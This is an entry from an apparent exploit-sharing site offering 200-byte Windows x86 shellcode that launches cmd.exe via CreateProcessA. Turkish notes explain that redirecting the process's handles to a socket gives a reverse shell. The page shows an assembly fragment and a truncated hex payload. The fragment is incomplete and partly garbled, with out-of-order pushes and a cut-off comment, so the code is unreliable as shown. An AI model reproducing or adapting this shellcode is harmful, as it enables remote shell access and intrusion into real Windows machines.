Siber Alem / Detail / 249 / Windows-x86-createprocess-cmd-exe-shellcode-200-bytes-klasik
vuln_report_viewer.sh
VULN REPORT / shellcode / ID: 249

Windows/x86 CreateProcess(cmd.exe) Shellcode - 200 Bytes (Klasik)

2026-07-21
1 views
Verified
Windows x86

Summary

This entry details a vulnerability found in the target system. The exploit was published on 2026-07-21 and has garnered 1 views from the community. It is classified under the shellcode category. Users are advised to review the source code in the Detail tab for technical specifics.

exploit_249.txt

Klasik Shellcode - Windows x86 - CreateProcess

Windows/x86 CreateProcess(cmd.exe) - 200 Bytes

WinExec'in aksine CreateProcessA, stdin/stdout/stderr handle'larini tam olarak kontrol etmenize olanak tanir. Shell'in giris/cikisini bir socket'e yonlendirerek network uzerinden reverse shell elde etmek mumkundur.

STARTUPINFO ile Handle Yonlendirme

; STARTUPINFO yapisi (68 bytes) sub esp, 0x44 ; 68 byte alan ac mov eax, esp push eax push eax xor edx, edx push edx ; lpCurrentDirectory = NULL push edx ; lpEnvir push 8 ; DETACHED_PROCESS push edx ; bInheritHandles push edx ; lpThreadAttributes push edx ; lpProcessAttributes push [cmd_ptr] ; cmd.exe push edx ; lpApplicationName call [CreateProcessA]

Hex Ornegi

\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70 \x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01... [kisaltildi]

Author Profile

Krun!x
Krun!x Elite Member
View All Submissions

Entry Stats

Views 1
Downloads 0
Comments 0